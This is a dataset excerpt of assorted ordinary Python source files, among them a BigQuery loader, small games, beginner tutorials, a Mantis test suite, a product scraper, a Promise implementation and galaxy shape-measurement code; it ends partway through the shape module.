Dataset columns: blob_id (string, length 40), language (string, 1 class), repo_name (string, length 5-133), path (string, length 2-333), src_encoding (string, 30 classes), length_bytes (int64, 18-5.47M), score (float64, 2.52-5.81), int_score (int64, 3-5), detected_licenses (list, length 0-67), license_type (string, 2 classes), text (string, length 12-5.47M), download_success (bool, 1 class).

blob_id | language | repo_name | path | src_encoding | length_bytes | score | int_score | detected_licenses | license_type | text | download_success
---|---|---|---|---|---|---|---|---|---|---|---|
3c362e6a9abc4726ac4753ecbcde76d8a0467565
|
Python
|
detianitatibs/getCryptocurrency
|
/loadCryptocurrecyGcsToBigQuery/main.py
|
UTF-8
| 1,994 | 2.515625 | 3 |
[] |
no_license
|
# -*- coding:utf-8 -*-
"""
Load the TSV files accumulated in Cloud Storage into BigQuery once a day (GCF version)
"""
__author__ = "@detian_itatbs"
__status__ = "development"
__version__ = "0.0.1"
__date__ = "16 January 2021"
import datetime
import os
from google.cloud import bigquery
def getNowDtStrAgo(isConvertJST=False):
"""
    Return the timestamp string (%Y%m%d%H%M%S) for one day before the current time.
    1st argument: set to True to convert to JST when the runtime clock is UTC.
"""
dt_now = datetime.datetime.now() - datetime.timedelta(days=1)
if isConvertJST :
dt_now = dt_now + datetime.timedelta(hours=9)
dt_str = dt_now.strftime('%Y%m%d%H%M%S')
return dt_str
def loadCryptocurrecyGcsToBigQuery(event, context):
bq = bigquery.Client()
dt_str = getNowDtStrAgo(True)
bucket = os.environ.get('BUCKET')
filename = os.environ.get('FILENAME')
project_id = os.environ.get('PROJECT_ID')
dataset = os.environ.get('DATASET')
table_name = os.environ.get('TABLE_NAME')
job_config = bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("timestamp", "DATETIME"),
bigquery.SchemaField("symbol", "STRING"),
bigquery.SchemaField("last", "FLOAT"),
bigquery.SchemaField("high", "FLOAT"),
bigquery.SchemaField("low", "FLOAT"),
bigquery.SchemaField("ask", "FLOAT"),
bigquery.SchemaField("bid", "FLOAT"),
bigquery.SchemaField("volume", "FLOAT"),
],
write_disposition=bigquery.WriteDisposition.WRITE_APPEND,
source_format=bigquery.SourceFormat.CSV,
field_delimiter='\t'
)
uri = 'gs://{0}/{1}/{2}/{3}/{4}_*'.format(bucket, dt_str[:4], dt_str[4:6], dt_str[6:8], filename)
table_id = '{0}.{1}.{2}${3}'.format(project_id, dataset, table_name, dt_str[:8])
load_job = bq.load_table_from_uri(
uri, table_id, job_config=job_config
) # Make an API request.
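    # Note: the load job is only started here; calling load_job.result() would block until it finishes.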
print("end")
| true |
c49b8c57b765585d198b31f13ce9f86de67a86a6
|
Python
|
Josh-Ay/breakout-game
|
/main.py
|
UTF-8
| 2,000 | 3.6875 | 4 |
[] |
no_license
|
from turtle import Screen
from ball import Ball
from paddle import Paddle
from block import Block
from scoreboard import Score
from random import choice
game_on = True
# Creating the screen
screen = Screen()
# Configuring the screen
screen.title("BreakOut Game")
screen.setup(700, 600)
screen.bgcolor("black")
screen.tracer(0)
# Creating instances of the ball, paddle and blocks
ball = Ball()
paddle = Paddle(0, -260)
score = Score()
score.display_score()
blocks = []
x_range = [x for x in range(-330, 330)]
y_range = [y for y in range(200, 260)]
for _ in range(10):
new_block = Block(choice(x_range), choice(y_range))
blocks.append(new_block)
# Tying events to the 'left' and 'right' keys
screen.onkey(paddle.move_left, "Left")
screen.onkey(paddle.move_right, "Right")
# Listening for the above events
screen.listen()
def play_game():
global game_on
if game_on:
screen.update() # update the screen
ball.move() # move the ball
# bounce off the wall
if ball.xcor() > 330 or ball.xcor() < -330:
ball.bounce_off_wall()
# bounce off the paddle
if paddle.distance(ball) <= 24.1421:
ball.bounce()
# bounce off top wall
if ball.ycor() > 280:
ball.bounce()
        # detect collision with a block and destroy the corresponding block
for block in blocks:
if block.distance(ball) < 28.8:
score.add_to_score() # add one to current score
blocks.remove(block) # remove block from list
ball.bounce()
block.goto(1000, 1000) # bye-bye block
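                # note: 'blocks' is modified while being iterated over; this is tolerated here
                # because at most one block is expected to be hit per frame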
# GAME_OVER: CHECK IF THERE ARE NO BLOCKS LEFT OR IF THE PADDLE WENT OUT OF RANGE
if ball.ycor() < -280 or len(blocks) == 0:
game_on = False
score.update_high_score()
screen.ontimer(play_game, 1) # keep calling 'play_game' after 1 millisecond
play_game()
screen.mainloop()
| true |
7640bc5c7d0590d59eb3309183b673ad858ba0ac
|
Python
|
201411096/study_flask
|
/flask/ex_04_full-stack-basic/01_backend/01_decorator/02_First-class-function.py
|
UTF-8
| 781 | 4.15625 | 4 |
[] |
no_license
|
"""
First-class function
1. Can a function be bound to an identifier?
2. Can a function be stored in a data structure?
3. Can a function be passed as an argument to a function call?
4. Can a function be returned from a function call?
"""
print('==============================')
def my_func(arg_num):
return arg_num *2
print(my_func(4))
tempFunc = my_func
print(tempFunc(4))
print('==============================')
def my_func_list(arg_list, arg_func):
for i in arg_list:
print(arg_func(i))
my_func_list([1,2,3,4,5], my_func)
print('==============================')
def myPrintFunc(arg_sender):
def inner_func(msg):
print(arg_sender + " : " + msg)
return inner_func
tempFunc2 = myPrintFunc('sender1')
tempFunc2('abc')
| true |
017309b7f3ceba4f2c8c252e988dc6845c1161c3
|
Python
|
ornellaolivastri/python_projects
|
/hello-world/hello_world.py
|
UTF-8
| 1,828 | 4.4375 | 4 |
[] |
no_license
|
print ("Hello, world!")
# this is how single-line comments are written
"""
this is a
multi-line comment
"""
"""
# variables
texto = "Esto es un texto guardado en la variable texto"
nombre = "mi nombre es ornella"
edad = 23
anio = 2021
print(texto)
print(f"{nombre} -y mi edad- {edad}") # edad could cause problems
# because print sometimes does not work well with numbers,
# so to cast the type you would write
# { str(edad) }
print(nombre + " y mi edad es " + str(edad)) # to do this, everything I concatenate
# must be of the same data type
# Reading keyboard input -------------------------------
sitioweb = input("Cual es tu pagina web?: ")
print(f"{sitioweb}, oki gracias")
# Conditionals ---------------------------------------------
"""
"""
altura = int ( input("Cual es tu altura?: ") )
if altura >= 180:
print("Eres una persona alta!!")
else:
print("Eres una persona baja!!")
"""
"""
# Functions -----------------------------------------------
variable_altura = int ( input("Cual es tu altura?: ") )
def mostrarAltura(altura):
resultado = ""
if altura >= 180:
resultado = "Eres una persona alta!!"
else:
resultado = "Eres una persona baja!!"
    # it is recommended that every function have a return
return resultado
print (mostrarAltura(variable_altura))
"""
# Lists --------------------------------------------------------------------------------
personas = ["Victor", "Paco", "Pepe"]
print(personas)
print("la persona de la posicion 1 es: " + personas[1])
# this for loop iterates over the personas list, creating a persona variable for each item
for persona in personas:
print("usuario: " + persona)
| true |
2ed5c80a96971e76bfd594921045f49819346c51
|
Python
|
chow1340/fleeting_interest
|
/chat/ChatService.py
|
UTF-8
| 1,745 | 2.625 | 3 |
[] |
no_license
|
from config.MongoConnectionConfig import MongoConnectionConfig
from bson import json_util, ObjectId
from bson.json_util import dumps
from datetime import timedelta
class ChatService():
__instance = None
@staticmethod
def getInstance():
""" Static access method. """
if ChatService.__instance == None:
ChatService()
return ChatService.__instance
def __init__(self):
""" Virtually private constructor. """
if ChatService.__instance != None:
raise Exception("This class is a singleton!")
else:
ChatService.__instance = self
self.mongoConnection = MongoConnectionConfig.getInstance()
self.mongo = self.mongoConnection.connect()
self.users = self.mongo.db.users
self.chat = self.mongo.db.chat
def getChat(self, chatId):
chat = self.chat.find_one({'_id': ObjectId(chatId)})
return chat
def updateLastMessage(self, chatId, message):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$set': {'lastMessageSent' : message}})
def updateLastMessageDate(self, chatId, date):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$set': {'lastMessageDate': date }}, upsert=True)
def updateTotalMessages(self, chatId):
self.chat.find_one_and_update({'_id': ObjectId(chatId)}, \
{'$inc': {'totalMessages':1}})
def setIsRead(self, chat, userId, isRead):
if chat['user1']['_id'] == userId:
user = "user1"
else:
user = "user2"
self.chat.find_one_and_update({'_id': chat['_id']}, \
{'$set': {user + '.hasRead' : isRead}})
return
| true |
953d5228a112b7c2031064ee7b24992879d163a1
|
Python
|
a1anwolker/bot
|
/natali37.py
|
UTF-8
| 1,580 | 2.640625 | 3 |
[] |
no_license
|
import requests
from bs4 import BeautifulSoup as BS
from tqdm import tqdm
req_link = requests.get('https://natali37.ru/catalog/products/label/1')
html = BS(req_link.content, 'lxml')
#get max_count of new-products on the site
counter = (html.select('div.products__right-counter.products__counter')[0]).get_text(strip=True)
#load page with max_count of products
req_link = requests.get('https://natali37.ru/catalog/products/label/1' + '?page=1&page_limit=' + [s for s in counter.split() if s.isdigit()][0])
html = BS(req_link.content, 'lxml')
catalog_wrapper = html.select('ul.products__list.list')[0]
catalog_list = catalog_wrapper.find_all('li', class_='product-card')
#list to store all data
products = []
for catalog in tqdm(catalog_list, desc='catalog_list'):
tag_a = catalog.select('a.product-card__name.link')[0]
link = 'https://natali37.ru' + tag_a['href']
price = [s for s in (catalog.select('div.product-card__price.price')[0]).get_text(strip=True).split() if s.isdigit()][0]
pictures = (catalog.select('a.swiper-container>div.swiper-wrapper')[0]).find_all('div', class_='swiper-slide')
pictures_list = []
for picture in pictures:
try:
pictures_list.append(((picture.find('img', class_='image'))['data-src']).replace('thumb.', ''))
except:
pictures_list.append(((picture.find('img', class_='image'))['src']).replace('thumb.', ''))
products.append([link, price, pictures_list])
for i in products:
print('link: ' + i[0])
print(' - price: ' + i[1])
print(' - images: ')
for j in i[2]:
print(' * ' + j)
| true |
cb1f676f8432faf6ee5a510fd49bd6dcb22dbdad
|
Python
|
animjain/PythonAdvancedTraining
|
/2019_Apr16/design_patterns/chainofactions_test.py
|
UTF-8
| 326 | 2.65625 | 3 |
[] |
no_license
|
from chain_of_actions import ChainOfActions
@ChainOfActions
def add_test(x, y):
return x + y
@ChainOfActions
def mul_test(x, y):
return x * y
@ChainOfActions
def sub_test(x, y):
return x - y
dataset = [(10, 20), (4.5, 6.7), ("55", 78), (None, False)]
ChainOfActions.add_data(dataset)
ChainOfActions.run()
| true |
fb2abffbf69d977ae12243f52db76dddf48499c1
|
Python
|
NovikovMA/python_training_mantis
|
/test/test_project_del.py
|
UTF-8
| 3,996 | 2.5625 | 3 |
[
"Apache-2.0"
] |
permissive
|
# -*- coding: utf-8 -*-
__author__ = 'M.Novikov'
from model.project import Project  # Mantis projects
from random import randrange  # randomness helpers
import random  # randomness helpers
# Project deletion test, verified through the user interface
def test_project_del_ui(app):
    if app.project.count() == 0:  # make sure at least one project exists in the list
        app.project.create(Project(name="Test project",description="Description test project."))  # add a new project
    old_projects = app.project.get_project_list()  # project list before deletion
    index = randrange(len(old_projects))  # pick a random index
    app.project.delete_by_index(index)  # delete the project
    new_projects = app.project.get_project_list()  # project list after deletion
    old_projects[index:index+1] = []  # remove the project from the local list
    assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
# Project deletion test, verified through the database
def test_project_del_db(app, orm):
    if len(orm.get_project_list()) == 0:  # make sure at least one project exists in the list
        app.project.create(Project(name="Test project",description="Description test project."))  # add a new project
    old_projects = orm.get_project_list()  # project list before deletion
    project = random.choice(old_projects)  # pick a random project
    app.project.delete_by_id(project.id)  # delete the project
    new_projects = orm.get_project_list()  # project list after deletion
    old_projects.remove(project)  # remove the project from the local list
    assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
# Project deletion test via the SOAP protocol
def test_project_del_soap(app):
    if len(app.soap.get_project_list()) == 0:  # make sure at least one project exists in the list
        app.project.create(Project(name="Test project",description="Description test project."))  # add a new project
    old_projects = app.soap.get_project_list()  # project list before deletion
    project = random.choice(old_projects)  # pick a random project
    app.project.delete_by_id(project.id)  # delete the project
    new_projects = app.soap.get_project_list()  # project list after deletion
    old_projects.remove(project)  # remove the project from the local list
    assert sorted(old_projects, key=Project.id_or_max) == sorted(new_projects, key=Project.id_or_max)
| true |
bc62bd3f66f78580d3c9135d81b7a6c2060a43d4
|
Python
|
NirmalVatsyayan/python-revision
|
/language_programs/python_numpy/18_numpy_comparison.py
|
UTF-8
| 1,052 | 4.125 | 4 |
[] |
no_license
|
import numpy as np
a = np.array([3, 3, 1], float)
b = np.array([0, 3, 2], float)
if False:
'''
comparing 2 numpy arrays
'''
print(a>b)
print(a>=b)
print(a<b)
print(a<=b)
print(a==b)
print(a!=b)
if False:
'''
comparing numpy array with scalar
'''
print(a>2)
if False:
'''
The any and all operators can be used
to determine whether or not any or all
elements of a Boolean array are true:
'''
print(any(a))
print(all(a))
if False:
'''
logical operation in numpy
'''
a = np.array([1, 3, 0], float)
print(a>0)
print(a<3)
print(np.logical_and(a > 0, a < 3))
print(np.logical_not(a))
print(np.logical_or(a>0, a<3))
if False:
'''
The where function forms a new array from two
arrays of equivalent size using a Boolean filter
to choose between elements of the two.
Its basic syntax is where(boolarray, truearray, falsearray):
'''
a = np.array([1, 3, 0], float)
print(np.where(a != 0, 1 / a, a))
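    # note: np.where evaluates both branches eagerly, so 1 / a still emits a divide-by-zero
    # warning for the element where a == 0, even though the result is selected correctly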
| true |
27784d0bd477add5ad530a344b39f4e2963ebf88
|
Python
|
TheLycaeum/letterinvasion
|
/letter_invader.py
|
UTF-8
| 1,773 | 3.28125 | 3 |
[] |
no_license
|
import curses
import string
import random
import time
def max_dimensions(window):
height, width = window.getmaxyx()
return height - 2, width - 1
def create_random_letter(width):
letter = random.choice(string.ascii_lowercase)
column = random.randrange(0, width)
return 0, column, letter
def move_invaders(invaders, height):
new = {}
for (row, column), char in invaders.items():
new_row = row + 1
if new_row > height:
new_row -= 1
new[(new_row, column)] = char
return new
def draw_invaders(invaders, window):
for (row, column), char in invaders.items():
if row > height or column > width:
continue
window.addch(row, column, char)
def kill_invader(invaders, q):
invaders = {key: value for key, value in invaders.items() if value is not q}
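    # note: 'is not' compares identity; it happens to work for single-character strings in
    # CPython because they are interned, but '!=' would be the safer comparison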
return invaders
def count_life(invaders, height):
life = 10
max_row = height - 1
for (row, column), char in invaders.items():
if max_row == row:
life -= 1
return life
def main(window):
curses.curs_set(0)
invaders = {}
global height, width
height, width = max_dimensions(window)
while True:
window.clear()
window.nodelay(True)
invader = create_random_letter(width)
invaders = move_invaders(invaders, height)
invaders[(invader[0], invader[1])] = invader[2]
q = window.getch()
if q != -1:
invaders = kill_invader(invaders, chr(q))
draw_invaders(invaders, window)
window.refresh()
kill_invader(invaders, q)
time.sleep(0.4)
window.refresh()
if count_life(invaders, height) == 0:
break
if __name__ == '__main__':
curses.wrapper(main)
| true |
7127833a9d19413f7f5f1c028d4a6fe3c823b990
|
Python
|
sublimelsp/LSP
|
/plugin/core/promise.py
|
UTF-8
| 7,637 | 3.203125 | 3 |
[
"MIT"
] |
permissive
|
from .typing import Callable, Generic, List, Optional, Protocol, Tuple, TypeVar, Union
import functools
import threading
T = TypeVar('T')
S = TypeVar('S')
TExecutor = TypeVar('TExecutor')
T_contra = TypeVar('T_contra', contravariant=True)
TResult = TypeVar('TResult')
class ResolveFunc(Protocol[T_contra]):
def __call__(self, resolve_value: T_contra) -> None:
...
FullfillFunc = Callable[[T], Union[TResult, 'Promise[TResult]']]
ExecutorFunc = Callable[[ResolveFunc[T]], None]
PackagedTask = Tuple['Promise[T]', ResolveFunc[T]]
class Promise(Generic[T]):
"""A simple implementation of the Promise specification.
See: https://promisesaplus.com
    Promise is in essence syntactic sugar for callbacks. It simplifies passing
    values from functions that might do work in an asynchronous manner.
Example usage:
* Passing return value of one function to another:
def do_work_async(resolve):
# "resolve" is a function that, when called with a value, resolves
# the promise with provided value and passes the value to the next
# chained promise.
resolve(111) # Can be invoked asynchronously.
def process_value(value):
              assert value == 111
Promise(do_work_async).then(process_value)
* Returning Promise from chained promise:
def do_work_async_1(resolve):
# Compute value asynchronously.
resolve(111)
def do_work_async_2(resolve):
# Compute value asynchronously.
resolve(222)
def do_more_work_async(value):
# Do more work with the value asynchronously. For the sake of this
# example, we don't use 'value' for anything.
              assert value == 111
return Promise(do_work_async_2)
def process_value(value):
              assert value == 222
Promise(do_work_async_1).then(do_more_work_async).then(process_value)
"""
@staticmethod
def resolve(resolve_value: S) -> 'Promise[S]':
"""Immediately resolves a Promise.
Convenience function for creating a Promise that gets immediately
resolved with the specified value.
Arguments:
resolve_value: The value to resolve the promise with.
"""
def executor_func(resolve_fn: ResolveFunc[S]) -> None:
resolve_fn(resolve_value)
return Promise(executor_func)
@staticmethod
def packaged_task() -> PackagedTask[S]:
class Executor(Generic[TExecutor]):
__slots__ = ("resolver",)
def __init__(self) -> None:
self.resolver = None # type: Optional[ResolveFunc[TExecutor]]
def __call__(self, resolver: ResolveFunc[TExecutor]) -> None:
self.resolver = resolver
executor = Executor() # type: Executor[S]
promise = Promise(executor)
assert callable(executor.resolver)
return promise, executor.resolver
# Could also support passing plain S.
@staticmethod
def all(promises: List['Promise[S]']) -> 'Promise[List[S]]':
"""
Takes a list of promises and returns a Promise that gets resolved when all promises
gets resolved.
:param promises: The list of promises
:returns: A promise that gets resolved when all passed promises gets resolved.
Gets passed a list with all resolved values.
"""
def executor(resolve: ResolveFunc[List[S]]) -> None:
was_resolved = False
def recheck_resolve_status(_: S) -> None:
nonlocal was_resolved
# We're being called from a Promise that is holding a lock so don't try to use
# any methods that would try to acquire it.
if not was_resolved and all(p.resolved for p in promises):
was_resolved = True
values = [p.value for p in promises]
resolve(values)
for p in promises:
assert isinstance(p, Promise)
p.then(recheck_resolve_status)
if promises:
return Promise(executor)
return Promise.resolve([])
def __init__(self, executor_func: ExecutorFunc[T]) -> None:
"""Initialize Promise object.
Arguments:
executor_func: A function that is executed immediately by this Promise.
It gets passed a "resolve" function. The "resolve" function, when
called, resolves the Promise with the value passed to it.
"""
self.resolved = False
self.mutex = threading.Lock()
self.callbacks = [] # type: List[ResolveFunc[T]]
executor_func(lambda resolve_value=None: self._do_resolve(resolve_value))
def __repr__(self) -> str:
if self.resolved:
return 'Promise({})'.format(self.value)
return 'Promise(<pending>)'
def then(self, onfullfilled: FullfillFunc[T, TResult]) -> 'Promise[TResult]':
"""Create a new promise and chain it with this promise.
When this promise gets resolved, the callback will be called with the
value that this promise resolved with.
Returns a new promise that can be used to do further chaining.
Arguments:
onfullfilled: The callback to call when this promise gets resolved.
"""
def callback_wrapper(resolve_fn: ResolveFunc[TResult], resolve_value: T) -> None:
"""A wrapper called when this promise resolves.
Arguments:
resolve_fn: A resolve function of newly created promise.
resolve_value: The value with which this promise resolved.
"""
result = onfullfilled(resolve_value)
# If returned value is a promise then this promise needs to be
# resolved with the value of returned promise.
if isinstance(result, Promise):
result.then(lambda value: resolve_fn(value))
else:
resolve_fn(result)
def sync_wrapper(resolve_fn: ResolveFunc[TResult]) -> None:
"""Call resolve_fn immediately with the resolved value.
A wrapper function that will immediately resolve resolve_fn with the
resolved value of this promise.
"""
callback_wrapper(resolve_fn, self._get_value())
def async_wrapper(resolve_fn: ResolveFunc[TResult]) -> None:
"""Queue resolve_fn to be called after this promise resolves later.
A wrapper function that will resolve received resolve_fn when this promise
resolves later.
"""
self._add_callback(functools.partial(callback_wrapper, resolve_fn))
if self._is_resolved():
return Promise(sync_wrapper)
return Promise(async_wrapper)
def _do_resolve(self, new_value: T) -> None:
# No need to block as we can't change from resolved to unresolved.
if self.resolved:
raise RuntimeError("cannot set the value of an already resolved promise")
with self.mutex:
self.resolved = True
self.value = new_value
for callback in self.callbacks:
callback(new_value)
def _add_callback(self, callback: ResolveFunc[T]) -> None:
with self.mutex:
self.callbacks.append(callback)
def _is_resolved(self) -> bool:
with self.mutex:
return self.resolved
def _get_value(self) -> T:
with self.mutex:
return self.value
| true |
c696694d9532538bba60aa872da6e39709200409
|
Python
|
jgingh7/Problem-Solving-Python
|
/FindTheWinnerOfAnArrayGame.py
|
UTF-8
| 656 | 3.59375 | 4 |
[] |
no_license
|
# https://leetcode.com/problems/find-the-winner-of-an-array-game/
# Time: O(n)
# Space: O(1)
from typing import List  # needed for the List type hint outside the LeetCode environment
class Solution:
def getWinner(self, arr: List[int], k: int) -> int:
currWinner = arr[0]
currK = k
for i in range(1, len(arr)):
if currWinner > arr[i]:
currK -= 1
else:
currWinner = arr[i]
currK = k - 1
if currK == 0:
return currWinner
        return currWinner  # if the loop ends without reaching k consecutive wins, currWinner is the
                           # maximum of the array and would keep winning forever, so it is the answer
| true |
849a86780d72e5cd5dde8ee9023bb7ab6ae498fe
|
Python
|
JacobGT/SQLite3PythonTutorial
|
/formatResults.py
|
UTF-8
| 560 | 3.84375 | 4 |
[] |
no_license
|
import sqlite3
# Connect to database
conn = sqlite3.connect("customers.db")
# Create a cursor
c = conn.cursor()
# Query the database (db)
c.execute("SELECT * FROM customers")
# The fetch command brings out the results as a tuple inside a python list, so you can access it like that ex. ()[#]
items = c.fetchall()
# Formatting the results
for item in items:
print("Name: " + item[0] + "\tLast Name: " + item[1] + "\tEmail: " + item[2])
# We also can just do: print(item)
# Commit changes to db
conn.commit()
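# (a commit is not strictly required after a SELECT, but it does no harm)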
# Close connection to db
conn.close()
| true |
5736caf9ab2f502796d43e7d0e6d33377dba8a0a
|
Python
|
sfarrens/sf_tools
|
/sf_tools/image/shape.py
|
UTF-8
| 12,027 | 3.3125 | 3 |
[
"MIT"
] |
permissive
|
# -*- coding: utf-8 -*-
"""SHAPE ESTIMATION ROUTINES
This module contains methods and classes for estimating galaxy shapes.
:Author: Samuel Farrens <samuel.farrens@gmail.com>
:Version: 1.4
:Date: 20/10/2017
Notes
-----
Some of the methods in this module are based on work by Fred Ngole.
"""
from __future__ import division
import numpy as np
def ellipticity_atoms(data, offset=0):
r"""Calculate ellipticity
This method calculates the ellipticity of an image from its shape
projection components.
Parameters
----------
data : numpy.ndarray
Input data array, the image to be analysed
offset : int, optional
Shape projection offset (default is '0')
Returns
-------
numpy.ndarray
Image ellipticity components
See Also
--------
shape_project : shape projection matrix
Notes
-----
This technique was developed by Fred Ngole and implements the following
equations:
- Equations C.1 and C.2 from [NS2016]_ appendix:
.. math::
e_1(\mathbf{X}_i) = \frac{<\mathbf{X}_i, \mathbf{U}_4>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 +
<\mathbf{X}_i, \mathbf{U}_1>^2}
{<\mathbf{X}_i, \mathbf{U}_3>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 -
<\mathbf{X}_i, \mathbf{U}_1>^2
}
e_2(\mathbf{X}_i) = \frac{2\left(<\mathbf{X}_i, \mathbf{U}_5>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>
<\mathbf{X}_i, \mathbf{U}_1>\right)}
{<\mathbf{X}_i, \mathbf{U}_3>
<\mathbf{X}_i, \mathbf{U}_2> -
<\mathbf{X}_i, \mathbf{U}_0>^2 -
<\mathbf{X}_i, \mathbf{U}_1>^2
}
Examples
--------
>>> from image.shape import ellipticity_atoms
>>> import numpy as np
>>> a = np.zeros((5, 5))
>>> a[2, 1:4] += 1
>>> ellipticity_atoms(a)
array([-1., 0.])
>>> b = np.zeros((5, 5))
>>> b[1:4, 2] += 1
>>> ellipticity_atoms(b)
array([ 1., 0.])
"""
XU = [np.sum(data * U) for U in shape_project(data.shape, offset)]
divisor = XU[3] * XU[2] - XU[0] ** 2 - XU[1] ** 2
e1 = (XU[4] * XU[2] - XU[0] ** 2 + XU[1] ** 2) / divisor
e2 = 2 * (XU[5] * XU[2] - XU[0] * XU[1]) / divisor
return np.array([e1, e2])
def shape_project(shape, offset=0, return_norm=False):
r"""Shape projection matrix
This method generates a shape projection matrix for a given image.
Parameters
----------
shape : list, tuple or numpy.ndarray
List of image dimensions
offset : int, optional
Shape projection offset (default is '0')
return_norm : bool, optional
Option to return l2 normalised shape projection components
(default is 'False')
Returns
-------
numpy.ndarray
Shape projection components
See Also
--------
ellipticity_atoms : calculate ellipticity
Notes
-----
This technique was developed by Fred Ngole and implements the following
equations:
- Equations from [NS2016]_ appendix:
.. math::
U_1 &= (k)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_2 &= (l)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_3 &= (1)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_4 &= (k^2 + l^2)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_5 &= (k^2 - l^2)_{1 \leq k \leq N_l, 1 \leq l \leq N_c} \\
U_6 &= (kl)_{1 \leq k \leq N_l, 1 \leq l \leq N_c}
Examples
--------
>>> from image.shape import shape_project
>>> shape_project([3, 3])
array([[[ 0., 0., 0.],
[ 1., 1., 1.],
[ 2., 2., 2.]],
<BLANKLINE>
[[ 0., 1., 2.],
[ 0., 1., 2.],
[ 0., 1., 2.]],
<BLANKLINE>
[[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]],
<BLANKLINE>
[[ 0., 1., 4.],
[ 1., 2., 5.],
[ 4., 5., 8.]],
<BLANKLINE>
[[ 0., -1., -4.],
[ 1., 0., -3.],
[ 4., 3., 0.]],
<BLANKLINE>
[[ 0., 0., 0.],
[ 0., 1., 2.],
[ 0., 2., 4.]]])
"""
U = []
U.append(np.outer(np.arange(shape[0]) + offset, np.ones(shape[1])))
U.append(np.outer(np.ones(shape[0]), np.arange(shape[1]) + offset))
U.append(np.ones(shape))
U.append(U[0] ** 2 + U[1] ** 2)
U.append(U[0] ** 2 - U[1] ** 2)
U.append(U[0] * U[1])
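    # U[0]..U[5] correspond to U_1..U_6 in the notes above:
    # row index k, column index l, a constant 1, k^2 + l^2, k^2 - l^2, and k*l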
    if return_norm:
        return np.array([np.linalg.norm(x, 2) for x in U])
    else:
        return np.array(U)
class Ellipticity():
""" Image ellipticity class
This class calculates image ellipticities from quadrupole moments.
Parameters
----------
data : numpy.ndarray
Input data array, the image to be analysed
sigma : int, optional
Estimation error (default is '1000')
centroid : numpy.ndarray, optional
        Centroid positions [x, y] of the input image (default is 'None')
moments : numpy.ndarray, optional
Quadrupole moments [[q00, q01], [q10, q11]] of the input image
        (default is 'None')
ellip_type : {'chi', 'epsilon'}, optional
Ellipticity type (default is 'chi')
Examples
--------
>>> from image.shape import Ellipticity
>>> import numpy as np
>>> a = np.zeros((5, 5))
>>> a[2, 1:4] += 1
>>> Ellipticity(a).e
array([-1., 0.])
>>> b = np.zeros((5, 5))
>>> b[1:4, 2] += 1
>>> Ellipticity(b).e
array([ 1., 0.])
"""
def __init__(self, data, sigma=1000, centroid=None, moments=None,
ellip_type='chi'):
self._data = data
self._sigma = sigma
self._ranges = np.array([np.arange(i) for i in data.shape])
self._ellip_type = ellip_type
self._check_ellip_type()
if not isinstance(moments, type(None)):
self.moments = np.array(moments).astype('complex').reshape(2, 2)
self._get_ellipse()
elif isinstance(centroid, type(None)):
self._get_centroid()
else:
self.centroid = centroid
self._update_weights()
self._get_moments()
def _check_ellip_type(self):
"""Check Ellipticity Type
This method raises an error if ellip_type is not 'chi' or 'epsilon'.
Raises
------
ValueError for invalid ellip_type
"""
if self._ellip_type not in ('chi', 'epsilon'):
raise ValueError('Invalid ellip_type, options are "chi" or '
'"epsilon"')
def _update_xy(self):
"""Update the x and y values
This method updates the values of x and y using the current centroid.
"""
self._x = np.outer(self._ranges[0] - self.centroid[0],
np.ones(self._data.shape[1]))
self._y = np.outer(np.ones(self._data.shape[0]),
self._ranges[1] - self.centroid[1])
def _update_weights(self):
"""Update the weights
This method updates the value of the weights using the current values
of x and y.
Notes
-----
This method implements the following equations:
- The exponential part of equation 1 from [BM2007]_ to calculate
the weights:
.. math::
w(x,y) = e^{-\\frac{\\left((x-x_c)^2+(y-y_c)^2\\right)}
{2\\sigma^2}}
"""
self._update_xy()
self._weights = np.exp(-(self._x ** 2 + self._y ** 2) /
(2 * self._sigma ** 2))
def _update_centroid(self):
r"""Update the centroid
This method updates the centroid value using the current weights.
Notes
-----
This method implements the following equations:
- Equation 2a, 2b and 2c from [BM2007]_ to calculate the position
moments:
.. math::
S_w = \sum_{x,y} I(x,y)w(x,y)
S_x = \sum_{x,y} xI(x,y)w(x,y)
S_y = \sum_{x,y} yI(x,y)w(x,y)
- Equation 3 from [BM2007]_ to calculate the centroid:
.. math::
X_c = S_x/S_w,\\
Y_c = S_y/S_w
"""
# Calculate the position moments.
iw = np.array([np.sum(self._data * self._weights, axis=i)
for i in (1, 0)])
sw = np.sum(iw, axis=1)
sxy = np.sum(iw * self._ranges, axis=1)
# Update the centroid value.
self.centroid = sxy / sw
def _get_centroid(self, n_iter=10):
"""Calculate centroid
This method iteratively calculates the centroid of the image.
Parameters
----------
n_iter : int, optional
        Number of iterations (default is '10')
"""
# Set initial value for the weights.
self._weights = np.ones(self._data.shape)
# Iteratively calculate the centroid.
for i in range(n_iter):
# Update the centroid value.
self._update_centroid()
# Update the weights.
self._update_weights()
# Calculate the quadrupole moments.
self._get_moments()
def _get_moments(self):
r""" Calculate the quadrupole moments
This method calculates the quadrupole moments.
Notes
-----
This method implements the following equations:
- Equation 10 from [C2013]_ to calculate the moments:
.. math::
Q_{ij}=\\frac{\\int\\int\\Phi(x_i,x_j) w(x_i,x_j)
(x_i-\\bar{x_i})(x_j-\\bar{x_j}) dx_idx_j}
{\\int\\int\\Phi(x_i,x_j)w(x_i,x_j)dx_idx_j}
"""
# Calculate moments.
q = np.array([np.sum(self._data * self._weights * xi * xj) for xi in
(self._x, self._y) for xj in (self._x, self._y)])
self.moments = (q / np.sum(self._data *
self._weights)).reshape(2, 2).astype('complex')
# Calculate the ellipticities.
self._get_ellipse()
def _get_ellipse(self):
r"""Calculate the ellipticities
        This method calculates ellipticities from quadrupole moments.
Notes
-----
This method implements the following equations:
- Equation 11 from [C2013]_ to calculate the size:
